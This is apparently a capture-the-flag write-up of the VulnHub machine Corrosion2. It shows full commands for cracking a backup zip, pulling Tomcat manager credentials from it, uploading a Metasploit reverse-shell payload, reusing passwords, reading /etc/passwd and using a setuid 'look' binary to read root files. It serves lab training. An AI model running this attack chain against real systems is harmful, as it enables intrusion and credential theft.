CTF : Corrosion2

CTF Corrosion2 writeup. Source VulnHub. Announced difficulty level: Medium

Posted by Boula-Bytes on 03 March 2022

CTF : Corrosion2

Informations

  • IP: 192.168.0.170
  • MYIP: 192.168.0.36

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p- -A 192.168.0.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-03 15:41 CET
Nmap scan report for 192.168.0.170
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6a:d8:44:60:80:39:7e:f0:2d:08:2f:e5:83:63:f0:70 (RSA)
|   256 f2:a6:62:d7:e7:6a:94:be:7b:6b:a5:12:69:2e:fe:d7 (ECDSA)
|_  256 28:e1:0d:04:80:19:be:44:a6:48:73:aa:e8:6a:65:44 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open  http    Apache Tomcat 9.0.53
|_http-title: Apache Tomcat/9.0.53
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:98:62:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.13 ms 192.168.0.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.19 seconds
console
$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.170:8080 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.170:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              rar,html,zip,tar.gz,tgz,bkp,id_rsa,xml,js,php,sql.bak,log,cgi,php.bak,tar,json,sh,py,pl,rb,txt,bak,sql,csv,pub,jar
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/03/03 15:46:06 Starting gobuster in directory enumeration mode
===============================================================
/docs/                (Status: 200) [Size: 14906]
/examples/            (Status: 200) [Size: 1126] 
/backup.zip           (Status: 200) [Size: 33723]
/readme.txt           (Status: 200) [Size: 153]  
/manager/             (Status: 401) [Size: 2499]

There is some interesting files ...

console
$ curl http://192.168.0.170:8080/readme.txt
Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
Also remember to use that password I gave you.

Ok, this could be the backup archive.

console
$ wget http://192.168.0.170:8080/backup.zip

This archive is password protected. I will use john to crack it.

console
$ zip2john backup.zip > backup_zip_hash.txt
console
$ john -wordlist=/usr/share/wordlists/rockyou.txt backup_zip_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)     
1g 0:00:00:07 DONE (2022-03-03 15:53) 0.1416g/s 1627Kp/s 1627Kc/s 1627KC/s @lexutz..<3mitch
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
console
unzip ../backup.zip
Archive:  ../backup.zip
[../backup.zip] catalina.policy password: 
  inflating: catalina.policy         
  inflating: context.xml             
  inflating: catalina.properties     
  inflating: jaspic-providers.xml    
  inflating: jaspic-providers.xsd    
  inflating: logging.properties      
  inflating: server.xml              
  inflating: tomcat-users.xml        
  inflating: tomcat-users.xsd        
  inflating: web.xml

The first file to look at is tomcat-users.xml because it's where tomcat users and passwords are stored :

console
$ cat tomcat-users.xml
[...]
<role rolename="manager-gui"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/>

<role rolename="admin-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
[...]

Ok, so we can connect to manager gui.

Vulnerabilities search

Now, I have access to tomcat manager-gui. I remembered there is tool in msf to upload a jar file that will execute a reverse shell.

Exploit

console
$ msfconsole
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
*msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.0.170
RHOSTS => 192.168.0.170
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword melehifokivai
HttpPassword => melehifokivai
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername manager
HttpUsername => manager
msf6 exploit(multi/http/tomcat_mgr_upload) > run

I had to execute it two times to get a reverse shell but, well, it works.

We got a shell :)

Privilege escalation

Enumeration for privesc

First I needed to spwan a tty :

console
python3 -c 'import pty; pty.spawn("/bin/bash")'

Now; let's see which users exists : 

console
$ cat /etc/passwd
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
tomcat:x:1001:1001::/home/tomcat:/bin/sh
jaye:x:1002:1002::/home/jaye:/bin/sh

We gonna take a look to randy's homedir :

console
$ cd /home/randy
$ cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6

I got user flag. And there is also a note : 

console
$ cat note.txt
Hey randy this is your system administrator, hope your having a great day! I just wanted to let you know
that I changed your permissions for your home directory. You won't be able to remove or add files for now.

I will change these permissions later on.

See you next Monday randy!

The third interesting I found is a python file :

console
$ ls -al randombase64.py
-rwxr-xr-x 1 root root 210 Sep 20 19:48 randombase64.py
$ cat randombase64.py
import base64

message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')

print(base64_message)

Impossible to look at jaye homedir, but I tried to su - jaye with the tomcat password and it works

And we can also use it via ssh :

console
$ ssh jaye@192.168.0.170
password : melehifokivai

There is a directory called Files with a setuid and setgid file inside :

console
$ file look
look: setuid, setgid executable, regular file, no read permission
$ ./look
usage: look [-bdf] [-t char] string [file ...]

look can be used to read files and as it got setuid we can read files as root

Exploit

Now we can read every files :

console
$ ./look '' /root/root.txt
2fdbf8d4f894292361d6c72c8e833a4b

Note that you can use pwnkit exploit to get a root shell.